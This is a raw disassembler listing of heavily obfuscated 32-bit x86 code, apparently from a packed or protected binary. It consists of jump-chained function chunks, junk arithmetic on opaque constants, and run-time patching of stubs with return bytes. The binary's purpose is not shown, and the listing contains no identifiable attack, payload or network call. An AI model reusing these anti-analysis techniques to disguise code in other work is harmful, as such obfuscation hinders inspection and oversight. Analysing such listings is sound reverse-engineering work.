loc_43D34A: ; CODE XREF: sub_449957+6j
jmp loc_43FF75
; END OF FUNCTION CHUNK FOR sub_449957
; ---------------------------------------------------------------------------
loc_43D34F: ; CODE XREF: ut7h7i2x:004443B9j
jmp loc_45728D
; ---------------------------------------------------------------------------
or eax, 0D7023465h
xchg ecx, edi
xor ebp, edi
jmp loc_440D3E
; ---------------------------------------------------------------------------
loc_43D363: ; CODE XREF: ut7h7i2x:00444220j
popf
; =============== S U B R O U T I N E =======================================
sub_43D364 proc near ; CODE XREF: ut7h7i2x:loc_458666p
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 0043D53A SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045158F SIZE 00000029 BYTES
xchg ecx, [esp+0]
pop ecx
mov eax, [esp-4+arg_0]
push edx
call sub_44B5CF
mov eax, 510AEA73h
push edi
jmp loc_43D53A
sub_43D364 endp
; ---------------------------------------------------------------------------
ror ecx, 12h
jmp sub_44F495
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4456F4
loc_43D384: ; CODE XREF: sub_4456F4+2AD5j
jz loc_44447D
jmp loc_458528
; END OF FUNCTION CHUNK FOR sub_4456F4
; =============== S U B R O U T I N E =======================================
sub_43D38F proc near ; CODE XREF: ut7h7i2x:0043B468j
; sub_4516C6+3178p
arg_0 = dword ptr 4
xchg ecx, [esp+0]
pop ecx
xchg ecx, [esp-4+arg_0]
jmp sub_43F3D1
sub_43D38F endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44865D
loc_43D39B: ; CODE XREF: sub_44865D+E1Bj
pushf
push 45F1D141h
pop edi
xor edi, 61EA5945h
sub edi, 0FC59F34Ch
jmp loc_43EA9C
; END OF FUNCTION CHUNK FOR sub_44865D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44EC11
loc_43D3B3: ; CODE XREF: sub_44EC11:loc_456872j
sub edx, 25E7355Eh
add edx, 47E075B6h
add edx, ebp
call sub_451F39
loc_43D3C6: ; CODE XREF: sub_440493+121F3j
jmp loc_44FCD8
; END OF FUNCTION CHUNK FOR sub_44EC11
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_450184
loc_43D3CB: ; CODE XREF: sub_450184+7j
jmp sub_43AA94
; END OF FUNCTION CHUNK FOR sub_450184
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_455DCD
loc_43D3D0: ; CODE XREF: sub_455DCD-124E3j
jmp loc_44C40B
; END OF FUNCTION CHUNK FOR sub_455DCD
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_148. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
loc_43D3D6: ; CODE XREF: ut7h7i2x:00450737j
jmp loc_4597B4
; ---------------------------------------------------------------------------
loc_43D3DB: ; CODE XREF: ut7h7i2x:004491F8j
jmp loc_4520FF
; ---------------------------------------------------------------------------
loc_43D3E0: ; CODE XREF: ut7h7i2x:00439FD0j
jmp locret_44DF98
; ---------------------------------------------------------------------------
loc_43D3E5: ; CODE XREF: ut7h7i2x:0044A20Bj
sbb ecx, eax
; =============== S U B R O U T I N E =======================================
sub_43D3E7 proc near ; CODE XREF: sub_444A08:loc_451967p
; FUNCTION CHUNK AT 004396CA SIZE 00000005 BYTES
xchg ecx, [esp+0]
pop ecx
mov eax, [eax]
call sub_43E68B
loc_43D3F2: ; CODE XREF: ut7h7i2x:0043F6DAj
push ecx
loc_43D3F3: ; CODE XREF: ut7h7i2x:loc_43F6C7j
xor edx, 7316276h
add edx, 0CEC3639h
push offset loc_4434C3
jmp loc_4396CA
sub_43D3E7 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_449C6F
loc_43D409: ; CODE XREF: sub_449C6F-4C3Dj
xchg edi, [esp+0]
push 0A9FE9BEh
xchg edi, [esp+4+var_4]
adc edx, 87C1EDECh
jmp loc_44C190
; END OF FUNCTION CHUNK FOR sub_449C6F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_45A84B
loc_43D41F: ; CODE XREF: sub_45A84B-16237j
mov [ecx], eax
push offset sub_4463C7
jmp nullsub_559
; END OF FUNCTION CHUNK FOR sub_45A84B
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_299. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_45854D
loc_43D42C: ; CODE XREF: sub_45854D-19C42j
jmp loc_43EC52
; END OF FUNCTION CHUNK FOR sub_45854D
; ---------------------------------------------------------------------------
loc_43D431: ; CODE XREF: ut7h7i2x:0043D14Bj
jmp loc_44B060
; ---------------------------------------------------------------------------
loc_43D436: ; CODE XREF: ut7h7i2x:00445475j
jz loc_458365
loc_43D43C: ; CODE XREF: ut7h7i2x:loc_44545Dj
add ebx, 95422419h
xor ebx, 0B1F3BE6h
add ebx, ebp
add ebx, 986F6C0h
mov [ebx], eax
jmp loc_4467CB
; ---------------------------------------------------------------------------
loc_43D457: ; CODE XREF: ut7h7i2x:00457F97j
sub ecx, 83BDF4D2h
; =============== S U B R O U T I N E =======================================
sub_43D45D proc near ; CODE XREF: ut7h7i2x:0043B85Ep
; FUNCTION CHUNK AT 00454B7B SIZE 00000005 BYTES
xchg ebx, [esp+0]
pop ebx
call sub_43AA94
mov ds:dword_41D194, eax
lea eax, nullsub_490
mov byte ptr [eax], 0C3h
jmp loc_454B7B
sub_43D45D endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_43D47A: ; CODE XREF: ut7h7i2x:00449442j
mov byte ptr [eax], 0C3h
jmp loc_44CDDC
; ---------------------------------------------------------------------------
push edi
push 38ADA8D0h
pop edi
jmp loc_45890A
; ---------------------------------------------------------------------------
locret_43D48E: ; CODE XREF: ut7h7i2x:00447A27j
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43DD17
loc_43D48F: ; CODE XREF: ut7h7i2x:loc_44E122j
; sub_43DD17+10431j
mov eax, ds:dword_43A7A8
mov al, [eax]
sub al, 99h
mov edx, ds:dword_43A7A8
imul byte ptr [edx]
jmp loc_44A4AE
; END OF FUNCTION CHUNK FOR sub_43DD17
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_533. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44FF66
loc_43D4A6: ; CODE XREF: sub_44FF66:loc_44FF79j
jmp loc_445425
; END OF FUNCTION CHUNK FOR sub_44FF66
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4454EA
loc_43D4AB: ; CODE XREF: sub_4454EA+Ej
jmp loc_45218F
; END OF FUNCTION CHUNK FOR sub_4454EA
; ---------------------------------------------------------------------------
loc_43D4B0: ; CODE XREF: ut7h7i2x:00458FF8j
jle loc_44080E
mov eax, [edi]
jnz loc_455262
test esi, ebp
jmp loc_4442A2
; ---------------------------------------------------------------------------
jmp ds:dword_41D0E0
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_151. PRESS KEYPAD "+" TO EXPAND]
dd 643783h, 48B5A00h, 0E85224h, 68000134h, 8D635144h, 0E9241487h
dd 0FFFFDAACh
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44E5AB
loc_43D4E8: ; CODE XREF: sub_44E5AB-14959j
or ecx, 605D4873h
test ecx, 20000000h
jmp loc_45AB48
; END OF FUNCTION CHUNK FOR sub_44E5AB
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_444EAA
loc_43D4F9: ; CODE XREF: sub_444EAA:loc_450AD1j
push ecx
mov ecx, edi
xchg ecx, [esp+4+var_4]
push 0A149839Bh
jmp loc_4481F8
; END OF FUNCTION CHUNK FOR sub_444EAA
; =============== S U B R O U T I N E =======================================
sub_43D509 proc near ; CODE XREF: ut7h7i2x:0043E62Ep
; ut7h7i2x:0044AB4Ej
xchg eax, [esp+0]
pop eax
call nullsub_2
jmp ds:dword_41D14C
sub_43D509 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44DF79
loc_43D518: ; CODE XREF: sub_44DF79-2194j
jmp loc_446E20
; END OF FUNCTION CHUNK FOR sub_44DF79
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_2. PRESS KEYPAD "+" TO EXPAND]
dw 0BC88h
; ---------------------------------------------------------------------------
lahf
add [eax], eax
pop edx
jmp loc_43D83C
; ---------------------------------------------------------------------------
loc_43D529: ; CODE XREF: ut7h7i2x:loc_441353j
jz loc_447758
; START OF FUNCTION CHUNK FOR sub_452EED
loc_43D52F: ; CODE XREF: sub_452EED+4j
jmp loc_44E76A
; END OF FUNCTION CHUNK FOR sub_452EED
; ---------------------------------------------------------------------------
loc_43D534: ; CODE XREF: ut7h7i2x:0044354Aj
jns loc_44977C
; START OF FUNCTION CHUNK FOR sub_43D364
loc_43D53A: ; CODE XREF: sub_43D364+13j
jmp loc_45158F
; END OF FUNCTION CHUNK FOR sub_43D364
; ---------------------------------------------------------------------------
shl eax, 0Bh
test eax, 0A68D59C4h
jmp loc_449770
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4393B6
loc_43D54D: ; CODE XREF: sub_4393B6+1ABF8j
sub edi, 36E88168h
or edi, ds:4000F6h
xor edi, 8FEFEFF9h
xchg edi, [esp+0]
call sub_449FD5
pop edx
jmp loc_442746
; END OF FUNCTION CHUNK FOR sub_4393B6
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4462B0
loc_43D56D: ; CODE XREF: sub_4462B0:loc_454439j
jns loc_44E973
; END OF FUNCTION CHUNK FOR sub_4462B0
; START OF FUNCTION CHUNK FOR sub_458054
loc_43D573: ; CODE XREF: sub_458054+1Ej
jmp loc_447286
; END OF FUNCTION CHUNK FOR sub_458054
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43F7B6
loc_43D578: ; CODE XREF: sub_43F7B6-280Bj
jmp nullsub_35
; END OF FUNCTION CHUNK FOR sub_43F7B6
; ---------------------------------------------------------------------------
pop edx
push ebx
jmp loc_44E96B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43DBEC
loc_43D584: ; CODE XREF: sub_43DBEC+1C8A4j
; DATA XREF: sub_4445DC+15E96o
cmp al, 0A4h
jz loc_446C23
jmp loc_43AE52
; END OF FUNCTION CHUNK FOR sub_43DBEC
; ---------------------------------------------------------------------------
loc_43D591: ; DATA XREF: sub_445AD1-B732o
popf
xor eax, ecx
pop ecx
ror eax, 19h
push edx
push 0DF708E2Ah
jmp loc_449F61
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_455AD6
loc_43D5A3: ; CODE XREF: sub_455AD6:loc_45892Dj
mov ds:off_41D204, eax
lea eax, sub_4450F6
call sub_443FB7
; END OF FUNCTION CHUNK FOR sub_455AD6
; START OF FUNCTION CHUNK FOR sub_457A66
loc_43D5B4: ; CODE XREF: sub_457A66-95F5j
jmp loc_44F147
; END OF FUNCTION CHUNK FOR sub_457A66
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44445F
loc_43D5B9: ; CODE XREF: sub_44445F-3BD3j
jmp loc_4519F2
; END OF FUNCTION CHUNK FOR sub_44445F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44261F
loc_43D5BE: ; CODE XREF: sub_44261F-7EF2j
jmp nullsub_5
; END OF FUNCTION CHUNK FOR sub_44261F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44F43B
loc_43D5C3: ; CODE XREF: sub_44F43B-4135j
push 8DDA8BE3h
; END OF FUNCTION CHUNK FOR sub_44F43B
; START OF FUNCTION CHUNK FOR sub_447EB5
loc_43D5C8: ; CODE XREF: sub_447EB5:loc_455B19j
pop ebx
sub ebx, 0DD705CB8h
cmp ebx, 1AD59C7Dh
jmp loc_458887
; END OF FUNCTION CHUNK FOR sub_447EB5
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_45168E
loc_43D5DA: ; CODE XREF: sub_45168E+80A5j
; sub_45168E+80B9j
rol eax, 1Dh
xor eax, 6AB328Fh
add eax, 4CC8E401h
xchg eax, [esp+4+var_4]
jmp sub_44A833
; END OF FUNCTION CHUNK FOR sub_45168E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44B45E
loc_43D5F1: ; CODE XREF: sub_44B45E:loc_4411D2j
sub edx, eax
pushf
adc esi, eax
mov ebx, [esi]
jmp loc_43DE56
; END OF FUNCTION CHUNK FOR sub_44B45E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44825D
loc_43D5FD: ; CODE XREF: sub_44825D-14B9j
or esi, edx
jmp loc_44A843
; END OF FUNCTION CHUNK FOR sub_44825D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_45A070
loc_43D604: ; CODE XREF: sub_45A070:loc_459E65j
jnz loc_4472D6
jmp loc_439F67
; END OF FUNCTION CHUNK FOR sub_45A070
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43BA9E
loc_43D60F: ; CODE XREF: sub_43BA9E+48EDj
jp loc_44A3B1
loc_43D615: ; CODE XREF: sub_43BA9E:loc_4599FAj
push 186515DAh
pop eax
or eax, 66127E2Dh
jns loc_452E33
; END OF FUNCTION CHUNK FOR sub_43BA9E
; START OF FUNCTION CHUNK FOR sub_444AA3
loc_43D627: ; CODE XREF: sub_444AA3+F07Dj
jmp loc_443793
; END OF FUNCTION CHUNK FOR sub_444AA3
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44EFD1
loc_43D62C: ; CODE XREF: sub_44EFD1+8j
jmp nullsub_515
; END OF FUNCTION CHUNK FOR sub_44EFD1
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43AED9
loc_43D631: ; CODE XREF: sub_43AED9:loc_43B5FAj
jmp loc_43F8F5
; END OF FUNCTION CHUNK FOR sub_43AED9
; ---------------------------------------------------------------------------
adc edx, 0F9DA9F67h
mov ebx, edi
jmp loc_452E32
; =============== S U B R O U T I N E =======================================
sub_43D643 proc near ; CODE XREF: sub_43CD08-16F6p
; ut7h7i2x:00457302j
xchg ebx, [esp+0]
pop ebx
mov eax, [eax]
push offset loc_43B148
jmp nullsub_30
sub_43D643 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44B1E7
loc_43D653: ; CODE XREF: sub_44B1E7-11D30j
jle loc_44B10F
xchg ecx, [ebp+0]
mov ebp, esi
loc_43D65E: ; CODE XREF: sub_44B1E7:loc_4479D6j
add eax, edx
xor eax, ebx
add eax, ecx
xor eax, esi
add eax, edi
jmp loc_44A717
; END OF FUNCTION CHUNK FOR sub_44B1E7
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_300. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43BBF3
loc_43D66E: ; CODE XREF: sub_43BBF3+14AADj
jmp nullsub_23
; END OF FUNCTION CHUNK FOR sub_43BBF3
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43A556
loc_43D673: ; CODE XREF: sub_43A556:loc_458C25j
pop esi
and esi, 5B6D5C4Ch
rol esi, 1
jnb loc_44AC5E
loc_43D682: ; CODE XREF: ut7h7i2x:00446685j
adc edi, 253237F9h
; END OF FUNCTION CHUNK FOR sub_43A556
; =============== S U B R O U T I N E =======================================
sub_43D688 proc near ; CODE XREF: sub_44917B-5C8Dp
; FUNCTION CHUNK AT 00447D07 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004523FF SIZE 00000008 BYTES
; FUNCTION CHUNK AT 00459CEF SIZE 00000005 BYTES
xchg ecx, [esp+0]
pop ecx
lea eax, nullsub_21
jmp loc_447D07
sub_43D688 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_439D5C
loc_43D697: ; CODE XREF: sub_439D5C:loc_458789j
mov esi, eax
push offset loc_4579BC
jmp nullsub_342
; END OF FUNCTION CHUNK FOR sub_439D5C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4523B3
loc_43D6A3: ; CODE XREF: sub_4523B3-55EDj
jl loc_4486EB
; END OF FUNCTION CHUNK FOR sub_4523B3
; START OF FUNCTION CHUNK FOR sub_452802
loc_43D6A9: ; CODE XREF: sub_452802+Cj
jmp loc_447E6B
; END OF FUNCTION CHUNK FOR sub_452802
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44917B
loc_43D6AE: ; CODE XREF: sub_44917B-A80Fj
jmp loc_44CC13
; END OF FUNCTION CHUNK FOR sub_44917B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_444273
loc_43D6B3: ; CODE XREF: sub_444273-669Dj
jmp loc_43EC8E
; END OF FUNCTION CHUNK FOR sub_444273
; ---------------------------------------------------------------------------
rol edx, 3
jmp loc_4486EA
; ---------------------------------------------------------------------------
loc_43D6C0: ; DATA XREF: ut7h7i2x:00440A25o
push 720CA90Dh
pop edi
sub edi, 727374F8h
xor edi, 0E4998C4Eh
add edi, ecx
add edi, 0E4FF485Dh
mov [edi], eax
jmp loc_455138
; ---------------------------------------------------------------------------
cdq
jmp sub_44D6FD
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44B122
loc_43D6E7: ; CODE XREF: sub_44B122+6F79j
not edi
add esi, 0A6E2E53Ch
loc_43D6EF: ; CODE XREF: sub_44B122:loc_452090j
add eax, 0B9212185h
or eax, 0EF256262h
sub eax, 0F2E320EEh
jmp loc_44CF1B
; END OF FUNCTION CHUNK FOR sub_44B122
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_439280
loc_43D706: ; CODE XREF: sub_439280:loc_44620Bj
and edi, 47C63B2Ah
add edi, 0BB7E1564h
mov [edi], eax
pop edi
retn
; END OF FUNCTION CHUNK FOR sub_439280
; ---------------------------------------------------------------------------
loc_43D716: ; CODE XREF: ut7h7i2x:0044D51Cj
rol eax, 15h
jmp loc_445F9D
; ---------------------------------------------------------------------------
loc_43D71E: ; CODE XREF: ut7h7i2x:0044018Ej
jnz loc_442EC2
jmp loc_43CFB1
; ---------------------------------------------------------------------------
loc_43D729: ; CODE XREF: ut7h7i2x:0043A15Ej
; ut7h7i2x:loc_443B75j
sub ecx, ds:4000F1h
cmp ecx, 0B7750DD1h
jmp loc_4549BF
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_452D3D
loc_43D73A: ; CODE XREF: sub_452D3D:loc_43D782j
sub ebx, 6F52D005h
sbb ecx, edx
test edi, 132DFF3Bh
loc_43D748: ; CODE XREF: ut7h7i2x:loc_44ED93j
jmp loc_456912
; END OF FUNCTION CHUNK FOR sub_452D3D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_456CBD
loc_43D74D: ; CODE XREF: sub_456CBD:loc_4464CAj
jnz loc_45004D
jmp loc_458109
; END OF FUNCTION CHUNK FOR sub_456CBD
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_275. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_441AED
loc_43D759: ; CODE XREF: sub_441AED+1j
jmp loc_45A513
; END OF FUNCTION CHUNK FOR sub_441AED
; =============== S U B R O U T I N E =======================================
sub_43D75E proc near ; DATA XREF: sub_4414CC+12o
add edi, 0CB42ED6Dh
mov [edi], edx
pop edi
sub_43D75E endp ; sp-analysis failed
; START OF FUNCTION CHUNK FOR sub_45854D
loc_43D767: ; CODE XREF: sub_45854D-25F9j
; sub_45854D+1D93j
call sub_44E9F4
loc_43D76C: ; CODE XREF: ut7h7i2x:004480ECj
jmp loc_4435BD
; END OF FUNCTION CHUNK FOR sub_45854D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43A556
loc_43D771: ; CODE XREF: sub_43A556+AFF0j
jmp loc_44D37A
; END OF FUNCTION CHUNK FOR sub_43A556
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_450EFA
loc_43D776: ; CODE XREF: sub_450EFA+1j
mov esi, ebp
call sub_44825D
loc_43D77D: ; CODE XREF: sub_43CDBA+1DABBj
jmp loc_4423E4
; END OF FUNCTION CHUNK FOR sub_450EFA
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_452D3D
loc_43D782: ; CODE XREF: sub_4583C4-1955Bj
; sub_452D3D:loc_45073Cj
jmp loc_43D73A
; END OF FUNCTION CHUNK FOR sub_452D3D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44F613
loc_43D787: ; CODE XREF: sub_44F613:loc_43FEEFj
jz loc_4537A0
ror ebx, 15h
sbb edx, ebp
jmp loc_45379E
; END OF FUNCTION CHUNK FOR sub_44F613
; =============== S U B R O U T I N E =======================================
sub_43D797 proc near ; CODE XREF: ut7h7i2x:00439735p
; sub_441765:loc_4403CCp ...
; FUNCTION CHUNK AT 004452C4 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 0044D4CE SIZE 00000018 BYTES
; FUNCTION CHUNK AT 00450933 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00459B46 SIZE 00000007 BYTES
call sub_44875F
loc_43D79C: ; CODE XREF: ut7h7i2x:004575C8j
jmp loc_4452C4
sub_43D797 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_43D7A1: ; CODE XREF: ut7h7i2x:0044A765j
jmp loc_45706F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_439BF8
loc_43D7A6: ; CODE XREF: sub_439BF8+1C509j
mov eax, [ebp+8]
test byte ptr [eax-10h], 38h
push offset sub_45ABAC
jmp loc_44260B
; END OF FUNCTION CHUNK FOR sub_439BF8
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_446F56
loc_43D7B7: ; CODE XREF: sub_446F56+7j
xor esi, 0A4053B37h
add esi, 0E4B69F81h
xchg esi, [esp+4+var_4]
jmp loc_454626
; END OF FUNCTION CHUNK FOR sub_446F56
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44F040
loc_43D7CB: ; CODE XREF: sub_44F040-8741j
push 7B586B0Dh
pop ebx
rol ecx, 1Eh
; END OF FUNCTION CHUNK FOR sub_44F040
; START OF FUNCTION CHUNK FOR sub_44D1F0
loc_43D7D4: ; CODE XREF: sub_44D1F0:loc_44B17Fj
lea eax, [ebp-12Dh]
push eax
call sub_43CA2D
mov [ebp-4], eax
jmp loc_4501E7
; END OF FUNCTION CHUNK FOR sub_44D1F0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43CD08
loc_43D7E8: ; CODE XREF: sub_43CD08+E256j
adc edx, [esp+arg_0]
add esp, 8
movzx eax, word ptr [eax]
shl eax, 2
push 45CCC82Bh
pop edx
jmp loc_454CFF
; END OF FUNCTION CHUNK FOR sub_43CD08
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_45A32D
loc_43D800: ; CODE XREF: sub_45A32D-FD5j
and edx, ecx
sbb edx, ecx
jno loc_448800
loc_43D80A: ; CODE XREF: sub_45A32D:loc_45934Cj
xor esi, 2A4640BBh
add edx, esi
pop esi
jmp loc_43F888
; END OF FUNCTION CHUNK FOR sub_45A32D
; ---------------------------------------------------------------------------
loc_43D818: ; CODE XREF: ut7h7i2x:0045899Fj
jg loc_43C325
push ecx
mov edx, [ebx]
; START OF FUNCTION CHUNK FOR sub_44F495
loc_43D821: ; CODE XREF: sub_44F495:loc_445AA9j
add eax, 2F98468h
call sub_43AA94
jmp loc_43FC27
; END OF FUNCTION CHUNK FOR sub_44F495
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_43. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
loc_43D832: ; CODE XREF: ut7h7i2x:00449788j
jmp loc_4592C6
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43FCEE
loc_43D837: ; CODE XREF: sub_43FCEE+9j
jmp loc_4515B8
; END OF FUNCTION CHUNK FOR sub_43FCEE
; ---------------------------------------------------------------------------
loc_43D83C: ; CODE XREF: ut7h7i2x:0043D524j
mov eax, [esp]
push edx
push ecx
push 48E1ED26h
pop ecx
jmp loc_4411F8
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_447CBE
loc_43D84C: ; CODE XREF: sub_447CBE:loc_448D82j
cdq
js loc_44DC0D
jmp loc_43A4A0
; END OF FUNCTION CHUNK FOR sub_447CBE
; ---------------------------------------------------------------------------
loc_43D858: ; CODE XREF: ut7h7i2x:0044D9DFj
call sub_43E6EB
; START OF FUNCTION CHUNK FOR sub_4589FE
loc_43D85D: ; CODE XREF: sub_4589FE:loc_458A09j
jmp loc_43CAC6
; END OF FUNCTION CHUNK FOR sub_4589FE
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43CCC3
loc_43D862: ; CODE XREF: sub_43CCC3:loc_451FBBj
jz loc_43C21B
jmp loc_44B10F
; END OF FUNCTION CHUNK FOR sub_43CCC3
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4589E0
loc_43D86D: ; CODE XREF: sub_43D021-444j
; ut7h7i2x:loc_43EC16j ...
jmp loc_43EF55
; ---------------------------------------------------------------------------
loc_43D872: ; CODE XREF: sub_4589E0-15FD5j
; ut7h7i2x:00448E1Aj
pop ecx
xchg ecx, [esp-4+arg_0]
mov ebp, ecx
pop ecx
retn
; END OF FUNCTION CHUNK FOR sub_4589E0
; =============== S U B R O U T I N E =======================================
sub_43D87A proc near ; CODE XREF: sub_43DCFF+F32Ap
; sub_44E361:loc_44F4EFj ...
var_4 = dword ptr -4
; FUNCTION CHUNK AT 0044A59C SIZE 0000000F BYTES
push esi
jmp loc_44A59C
sub_43D87A endp
; ---------------------------------------------------------------------------
and ebp, 7AB70953h
jmp loc_448787
; ---------------------------------------------------------------------------
loc_43D88B: ; CODE XREF: ut7h7i2x:00452925j
test edx, ecx
jmp loc_43BB3A
; ---------------------------------------------------------------------------
loc_43D892: ; DATA XREF: sub_450A48+3o
push eax
mov eax, ecx
xchg eax, [esp]
mov esp, ebp
xchg ecx, [esp]
jmp loc_43A066
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44F22A
loc_43D8A2: ; CODE XREF: sub_44F22A:loc_45A100j
jb loc_45041D
mov eax, [esp+0]
push eax
mov eax, edx
call sub_44E361
; END OF FUNCTION CHUNK FOR sub_44F22A
; START OF FUNCTION CHUNK FOR sub_44B43D
loc_43D8B3: ; CODE XREF: sub_44B43D:loc_44815Bj
pop edx
rol edx, 1Eh
cmp edx, 68C2C4DCh
jmp loc_4496B2
; END OF FUNCTION CHUNK FOR sub_44B43D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43A2F5
loc_43D8C2: ; CODE XREF: sub_43A2F5:loc_45348Fj
xchg ebx, [esp+0]
call sub_454ABB
push offset sub_439354
jmp nullsub_266
; END OF FUNCTION CHUNK FOR sub_43A2F5
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43C9F5
loc_43D8D4: ; CODE XREF: sub_43C9F5:loc_44A164j
; sub_43C9F5+F02Aj
or eax, 62079722h
add eax, 8DC80179h
call sub_4448AF
push offset sub_43F015
jmp loc_44F313
; END OF FUNCTION CHUNK FOR sub_43C9F5
; ---------------------------------------------------------------------------
loc_43D8EF: ; CODE XREF: ut7h7i2x:0044B275j
js loc_44DC7A
sub ebx, edi
loc_43D8F7: ; CODE XREF: ut7h7i2x:loc_44B250j
add edx, 918FC351h
add edx, ebp
add edx, 84F63DC2h
call sub_44640F
; START OF FUNCTION CHUNK FOR sub_43CE34
loc_43D90A: ; CODE XREF: sub_43CE34+FAA3j
jmp loc_44CF84
; END OF FUNCTION CHUNK FOR sub_43CE34
; ---------------------------------------------------------------------------
jo loc_44FA02
test ebp, esi
jmp loc_459E74
; ---------------------------------------------------------------------------
loc_43D91C: ; DATA XREF: ut7h7i2x:00439668o
mov byte ptr [eax], 0C3h
jmp loc_43E509
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43DCFF
loc_43D924: ; CODE XREF: sub_43DCFF+4j
pop edx
mov eax, [esp-4+arg_0]
push eax
loc_43D929: ; CODE XREF: ut7h7i2x:loc_445FB9j
jmp loc_44D024
; END OF FUNCTION CHUNK FOR sub_43DCFF
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_45500F
loc_43D92E: ; CODE XREF: sub_45500Fj
push edx
mov edx, ebp
xchg edx, [esp+0]
mov ebp, esp
call sub_44C8F3
loc_43D93B: ; DATA XREF: sub_43B5D4+19ABBo
mov [ebx], eax
pop ebx
; END OF FUNCTION CHUNK FOR sub_45500F
; START OF FUNCTION CHUNK FOR sub_43A5C0
loc_43D93E: ; CODE XREF: sub_43A5C0:loc_445A39j
; sub_4489DF+9CB0j
call sub_459E7A
; END OF FUNCTION CHUNK FOR sub_43A5C0
; START OF FUNCTION CHUNK FOR sub_43C08A
loc_43D943: ; CODE XREF: sub_43C08A+Fj
jmp nullsub_31
; END OF FUNCTION CHUNK FOR sub_43C08A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43A0C7
loc_43D948: ; CODE XREF: sub_43A0C7+Ej
jmp loc_442961
